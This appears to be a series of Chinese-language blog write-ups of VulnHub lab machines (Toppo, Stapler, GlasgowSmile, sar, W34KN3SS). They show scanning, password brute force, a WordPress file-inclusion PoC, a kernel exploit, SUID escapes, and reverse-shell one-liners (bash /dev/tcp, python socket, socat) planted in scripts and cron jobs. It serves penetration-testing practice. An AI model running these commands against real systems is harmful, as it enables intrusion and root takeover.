Vulnhub-Toppo靶机，python、awk的SUID提权，两种提权方式 vulnhub-Toppo靶机，SUID提权这个靶机主要是SUID提权，相对简单，靶机下载：官网链接：https://download.vulnhub.com/toppo/Toppo.zip使用nmap和dirb进行web打点nmap -sS 10.10.10.222 -p- -A -T4dirsearch -u http://10.10.10.222/web识别，是一个普通的html页面whatweb http://10.10.10.222/发现了一个密码信息 12345ted123我们猜测账号就是那串密码夹着中间的英文ted登录成功之后就是内网渗透，我们使用FeatherScan进行内网信息收集git clone https://github.com/baibaixiaoyu2024/FeatherScan.gitcd FeatherScan_v4_5_python -m http.server​# 靶机wget 10.10.10.130:8000/FeatherScan_v4_5wget 10.10.10.130:8000/feather_vuln_db.txtchmod +x FeatherScan_v4_5./FeatherScan_v4_5发现提权漏洞得到两个提权向量，两个命令都可以用awk 'BEGIN {system("/bin/sh")}'python -c 'import os; os.execl("/bin/sh", "sh", "-p")' # 靶机没有sh就用bash替换至此提权成功！很简单吧

VulnHub-STAPLER: 1 内核&sudo提权 靶机地址：https://www.vulnhub.com/entry/stapler-1,150/靶机描述：Stapler is reported to be one of several vulnerable systems that are supposed to assist penetration testers with challenges similar to Offensive Security’s PWK coursework.这个靶机打开的时候呢需要选择“我已移动此虚拟机”否则可能打不开，或者导致网络错误我们在端口扫描的时候，就能看到ftp是允许匿名登录的除了80端口还有12380端口都是http服务我们对第一个http服务，也就是80端口进行目录扫描curl http://10.10.10.220/.profilecurl http://10.10.10.220/.bashrc使用上面的命令可以看到这些内容（没有什么东西）接下来我们使用ftp匿名登录有一个note笔记，把它get下来查看┌──(root㉿kali)-[~]└─# ftp 10.10.10.220Connected to 10.10.10.220.220-220-|-----------------------------------------------------------------------------------------|220-| Harry, make sure to update the banner when you get a chance to show who has access here |220-|-----------------------------------------------------------------------------------------|220-220Name (10.10.10.220:kali): ftp331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls550 Permission denied.200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-r--r--    1 0        0             107 Jun 03  2016 note226 Directory send OK.ftp> cd note550 Failed to change directory.ftp> ls200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-r--r--    1 0        0             107 Jun 03  2016 note226 Directory send OK.ftp> get notelocal: note remote: note200 PORT command successful. Consider using PASV.150 Opening BINARY mode data connection for note (107 bytes).100% |*********************|   107        1.03 MiB/s    00:00 ETA226 Transfer complete.107 bytes received in 00:00 (110.69 KiB/s)ftp> exit221 Goodbye.​┌──(root㉿kali)-[~]└─# cat note # 查看noteElly, make sure you update the payload information. Leave it in your FTP account once your are done, John.翻译结果如下没有找到有用的信息，我们来到12380端口的web，他报了一个400，使用目录扫描的时候也不正常我们增加一个https试试随后进行目录扫描dirsearch -u https://10.10.10.220:12380/包含了一个robots.txt还有phpmyadmin，但是我们不知道账号密码在phpmyadmin登录这里有一个“帮助”按钮点进去就有了phpmyadmin的版本信息 这样子找找phpmyadmin的nday（利用过几个之后也没什么作用）我们打开目录扫描出来的robobts.txt，包含了两个目录，一个是后台界面的目录，一个是博客地址访问后台，缺弹出了一个框，看这个样子应该是被别人黑过，留下了一个xssbeef的payload使用whatweb识别cms是属于wordpress站点whatweb https://10.10.10.220:12380/blogblog/利用wordpress渗透工具wpscan，枚举可能存在的用户并使用这些用户名对后台进行爆破，使用kali中的seclists字典wpscan --url https://10.10.10.220:12380/blogblog/ -e u -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt爆破成功后应该会显示这四组账号密码wpscan --url https://10.10.10.220:12380/blogblog/ -e u -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt --disable-tls-checksgarry:footballharry:monkeyscott:cookietim:thumb登录后台第一篇文章第二篇文章，还有第三篇文章，都没有什么用我们访问wordpress插件的目录（dirb，dirsearch都能扫出来）可以看到有三个插件来看第一个插件，他会有一个readme.txt版本是1.0在这里我们搜索这个插件的漏洞，额外找到了突破点我们尝试运行这个exp，报了一些错误，显示的是Connection refused即连接被拒绝我们查看一下他的源码我们修改这个内容sed -i 's|http://127.0.0.1/wordpress|https://10.10.10.220:12380/blogblog|g' 39646.py在这里解释一下sed命令，平时我也不怎么用，-i参数表示的是直接修改这个文件，由于url中包含了很多个/所以就换了个符号|进行分割，不然也可以使用/，s表示替换命令，最后面那个g表示全局替换，使用示例sed -i 's/原内容/新内容/g' # / 写法sed -i 's|原内容|新内容|g' # | 写法此时我们就已经把想要替换掉的内容直接替换掉了此时又出现了一个问题，ssl错误，我们的靶机站点ssl错误了，不清楚怎么修改代码不要紧，我们使用他提供的poc手工打（这个漏洞脚本中有）下面这个poc是一个文件包含漏洞https://10.10.10.220:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php访问的时候出现了一个url，但是没有出现wp-config.php的文件内容https://10.10.10.220:12380/blogblog/?p=1180访问这个地址，显示了一个页面不存在的样子随后我找了半天，尝试了各种操作，在uploads中找到了不知不觉新增了几张图片https://10.10.10.220:12380/blogblog/wp-content/uploads/我访问其中一张图片的时候发现了数据库的密码root : plbkac，原来访问了那个文件包含的poc，在这里会生成几张图片，二这个图片的内容就是你包含的文件的内容！curl -k https://10.10.10.220:12380/blogblog/wp-content/uploads/2145541298.jpeg我们登录数据库，目标id为1的john解密 incorrecthttps://www.somd5.com/使用数据库密码和其他用户试试（同样使用文件包含漏洞，获取/etc/passwd文件内容），下面是可能的用户┌──(root㉿kali)-[/data/demo]└─# cat user.txtsyncpeterRNunemakerETollefsonDSwangerAParnellSHayslettMBassinJBareLSolumMFreiSStroudCCeaserJKanodeCJooJLippsjamieSamDrewjessSHAYTaylormelkaizoeNATHANwwwelly使用这些用户，还有数据库的密码，进行爆破（猜测数据库密码是其中任意一个用户的名字）使用ssh进行登录使用featherscan，进行Linux信息收集git clone https://github.com/baibaixiaoyu2024/FeatherScan.gitcd FeatherScan/FeatherScan_v4_5_/chmod +x FeatherScan_v4_5./FeatherScan_v4_5发现了如下漏洞信息，如果仔细辨别名称的话，这个系统版本都不属于这些漏洞范围挑选了最可能存在的一个内核exp。提权失败了当然不能局限于这些内核漏洞，毕竟工具不能代替人工，随后找到了这个exp最后面有一个exp，我们去下载zoe@red:/tmp$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip​zoe@red:/tmp$ ls39772.zip FeatherScan searchsploit_commands_21765.sh vmware-rootzoe@red:/tmp$ unzip 39772.zipArchive:  39772.zip  creating: 39772/inflating: 39772/.DS_Store  creating: __MACOSX/  creating: __MACOSX/39772/inflating: __MACOSX/39772/._.DS_Storeinflating: 39772/crasher.tarinflating: __MACOSX/39772/._crasher.tarinflating: 39772/exploit.tarinflating: __MACOSX/39772/._exploit.tarzoe@red:/tmp$ ls39772  39772.zip FeatherScan __MACOSX searchsploit_commands_21765.sh vmware-rootzoe@red:/tmp$ cd 39772zoe@red:/tmp/39772$ lscrasher.tar exploit.tarzoe@red:/tmp/39772$ tar -xvf exploit.tarebpf_mapfd_doubleput_exploit/ebpf_mapfd_doubleput_exploit/hello.cebpf_mapfd_doubleput_exploit/suidhelper.cebpf_mapfd_doubleput_exploit/compile.shebpf_mapfd_doubleput_exploit/doubleput.czoe@red:/tmp/39772$ lscrasher.tar ebpf_mapfd_doubleput_exploit exploit.tarzoe@red:/tmp/39772$ cd eebpf_mapfd_doubleput_exploit/ exploit.tarzoe@red:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ lscompile.sh doubleput.c hello.c suidhelper.czoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$./compile.shdoubleput.c: In function ‘make_setuid’:doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]  .insns = (__aligned_u64) insns,            ^doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]  .license = (__aligned_u64)""  # 这里报错不要紧，不影响脚本正常编译              ^zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ lscompile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.czoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$./doubleputstarting writevwoohoo, got pointer reusewritev returned successfully. if this worked, you'll have a root shell in <=60 seconds.whoami​suid file detected, launching rootshell...we have root privs now...root@red:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoamiroot至此提权成功！其他思路，在home下面发现了一个sudo用户peter，而且能够使用sudo查看历史命令，发现了另外两个用户的密码，其中包含了peter！能使用sudo！那么思路不就来了sshpass -p thisimypassword ssh JKanode@localhostsshpass -p JZQuyIN5 peter@localhost有了密码，使用sudo的时候发现sudo权限是all，那我们就能直接提权 sudo -i至此两种方法提权成功。感谢阅读至此的你，致敬~往期推荐新版BurpSuite v2025.6.3汉化版，附激活教程挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

VulnHub--GlasgowSmile-v1.1 靶机地址：https://www.vulnhub.com/entry/glasgow-smile-11,491/首先对目标地址进行端口扫描访问80界面来看看插件的内容以及dirb目录扫描的结果，这里发现了一个joomla的cms内容管理系统我们使用joomscan进行目录扫描joomscan --url http://10.10.10.129/joomla版本指纹为 Joomla 3.7.3rc1尝试一顿操作后，都登录不进去，找exp也没有，那么就来爆破后台地址http://10.10.10.129/joomla/administrator普通密码字典爆破失败后我又试着将index.php中的信息用cewl做成字典进行尝试cewl http://10.10.10.129/joomla > dict1.txt继续打开burp抓包，尝试admin进行爆破添加字典没有结果这里要使用这个默认的用户joomla此时的密码就爆破成功了来到后台的管理我们找到已启动的主题这里修改配置文件，为反弹shell的php（kali自带的）之后访问主页就能反弹成功了我们使用FeatherScanwget 10.10.10.128:8000/FeatherScanchmod +x FeatherScan./FeatherScan检查敏感文件/etc/passwd、/etc/shadow都不可写，以及sudo命令都不可以使用通过FeatherScan linux内网扫描工具扫描出来可能存在脏牛提权漏洞尝试一下是失败的，看样子是已经修复了的切换思路，我们来到cms的配置文件可以看到密码就是Gotham（刚刚爆破出来的结果）mysql -ujoomla -pbabyjokeruse joomla_dbuse mysqlselect User,Password from user;找到了root的解密结果为babyjoker切换任意一个用户试试看样子都没有效果，我们换一个数据库看看use batjokeselect * from taskforce;很好找到了这些密码，全部记下来并解密（base64）Bane:baneishereAaron:aaronishereCarnage:carnageisherebuster:busterishereffrob:???AllIHaveAreNegativeThoughts???aunt:auntis the fuck here发现rob用户存在，切换用户成功找到第一个flag这里有一个abner用户的求救文件，看样子是一个加密文件，那么是什么加密呢，从一封信的角度来看，对内容做隐藏让我想到了ROT13https://btsrk.me/，打开这个站点，我们对这个结果进行解密翻译结果如下简单来说就是让我们解密这段base64加密的结果STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==┌──(root㉿kali)-[/data/demo]└─# echo "STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==" | base64 -dI33hope99my0death000makes44more8cents00than0my0life0解密成功后就切换到这个用户找到第二个flag，又有一个提示信息，但是没什么用前面信息收集都搜集的差不多了（FeatherScan），直到我查看到了他的历史命令包含了这样一个东西找到这个文件的位置，还要我们输入密码find / -name .dear_penguins.zip 2>/dev/null下载下来尝试爆破，用kali自带的字典一顿操作没有结果后，我使用了当前用户的密码进行猜测，就成功了abner@glasgowsmile:/var/www/joomla2/administrator/manifests/files$ unzip .dear_penguins.zip -d /tmp<r/manifests/files$ unzip .dear_penguins.zip -d /tmpArchive: .dear_penguins.zip[.dear_penguins.zip] dear_penguins password: I33hope99my0death000makes44more8cents00than0my0life0​inflating: /tmp/dear_penguins abner@glasgowsmile:/$ cd /tmpcd tmpabner@glasgowsmile:/tmp$ lslsdear_penguinsabner@glasgowsmile:/tmp$ cat dear_penguinscat dear_penguinsMy dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz就又看到一段密文scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz，再次切换用户试试在penguin用户中看到了一个find命令，且具有suid权限，很多人可能会想到find提权，但是这里可不是，下面看描述1、s（setuid 位）：表示该文件在执行时，会以文件所有者（penguin）的权限运行，而不是执行者的权限。2、这里的所有者是penguin，所以find运行时会有penguin的权限（不是root）。我们来看下面这个文件，也是一个可执行文件，查看内容竟然是一个可执行sh脚本开始修改penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '#/bin/sh'#/bin/shpenguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '#!/bin/bash' > .trash_oldpenguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '/bin/sh -i >& /dev/tcp/10.10.10.130/1234 0>&1' >> .trash_oldpenguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old#!/bin/bash/bin/sh -i >& /dev/tcp/10.10.10.130/1234 0>&1penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ./.trash_old​到此提权成功往期推荐不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学防溯源小技巧ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术，ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录

sar靶机，suid计划任务提权 下载地址：https://www.vulnhub.com/entry/sar-1,425/首先是利用arp-scan进行主机发现其次是使用map对其进行端口扫描目录扫描一个cms，并且网站标题中已经泄露了版本信息我们检索cms漏洞将这个exp复制到本地反弹shellexport RHOST="10.10.10.128";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'# 或者socat TCP:10.10.10.1:8888 EXEC:/bin/bash创建交互式终端python3 -c 'import pty;pty.spawn("/bin/bash")'然后内网信息收集一堆操作，参考：https://mp.weixin.qq.com/s/B4Lc6gLNU0PuToGjrlngOA看到计划任务中包含了一个root文件每过5分钟执行一次cat /etc/crontabwww-data@sar:/var/www/html$ cat finally.shcat finally.sh#!/bin/sh​./write.shwww-data@sar:/var/www/html$ cat write.shcat write.sh#!/bin/sh​touch /tmp/gatewaywww-data@sar:/var/www/html$ ls -lls -ltotal 32-rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh-rw-r--r-- 1 www-data www-data 10918 Oct 20 2019 index.html-rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php-rw-r--r-- 1 root root 9 Oct 21 2019 robots.txtdrwxr-xr-x 4 www-data www-data 4096 Oct 20 2019 sar2HTML-rwxrwxrwx 1 www-data www-data 30 Oct 21 2019 write.shwww-data@sar:/var/www/html$ echo 'export RHOST="10.10.10.128";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'' >> write.sh<fd in (0,1,2)];pty.spawn("/bin/bash")'' >> write.shbash: syntax error near unexpected token `('www-data@sar:/var/www/html$ cat write.shcat write.sh#!/bin/sh​touch /tmp/gatewaywww-data@sar:/var/www/html$ lslsfinally.sh index.html phpinfo.php robots.txt sar2HTML write.shwww-data@sar:/var/www/html$ echo 'socat TCP:10.10.10.1:8888 EXEC:/bin/bash' >> write.sh<cat TCP:10.10.10.1:8888 EXEC:/bin/bash' >> write.shwww-data@sar:/var/www/html$ cat write.shcat write.sh#!/bin/sh​touch /tmp/gatewaysocat TCP:10.10.10.1:8888 EXEC:/bin/bashwww-data@sar:/var/www/html$随后等待5分钟即可，本次靶机主要是利用计划任务提权 

W34KN3SS，通过openssl漏洞公匙获取私匙 下载地址：https://www.vulnhub.com/entry/w34kn3ss-1,270/使用nmap进行端口扫描将这个域名，追加到hosts（本机也要追加C:\Windows\System32\drivers\etc\hosts）这个靶机中是有两个web的，一个web是用ip访问的一个web是用域名访问的，所以也需要注意，仔细观察这个n30可能是一个有用的信息目录扫描出来的一个结果，包含了一个公匙和一个版本文件查看公匙文件这个提示信息，表示的是刚刚那个.pub文件是由openssl 0.9.8c-1生成的使用searchsploit检索漏洞库我们查看第一个txt漏洞描述根据他的描述，我们下载这个文件wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2tar -jxvf 5622.tar.bz2开始对比公匙和密匙，将root@targetcluster前面的东西拿出来进行对比尝试直接登录目录靶机，用户名是什么呢？目前得知的结果就是刚开始找到的那个n30，只能使用这个进行测试了ssh -i rsa/2048/4161de56829de2fe64b9055711f531c1-2537 n30@weakness.jth用最近爆出来CVE-2025-32463试试提权相关的学习文章：https://www.freebuf.com/articles/vuls/437488.htmlgit clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.gitzip -r exp.zip CVE-2025-32463_chwoot本来想要使用最新的提权漏洞的，但是这里没有Docker命令，就利用不了了完整使用方法（仅作介绍）# 2 – build and run Docker image (tagged "sudo-chwoot")$ ./run.sh​# 3 – run exploit in container (drops you into a root shell)pwn@0da3726bd81f:~$ ./sudo-chwoot.shwoot!root@0da3726bd81f:/# iduid=0(root) gid=0(root) groups=0(root),1001(pwn)继续信息收集（搜集了一圈也没有什么可以利用的），只有这个code这个可执行文件我们并不知道是什么，执行file命令查看文件类型属于py文件我们找到网上在线pyc反编译工具，放入进行反编译后查看内容（在放入反编译前要先将code文件改成code.pyc文件）https://tool.lu/pyc/得到n30用户的密码dMASDNB!!#B!#!#33至此靶机完成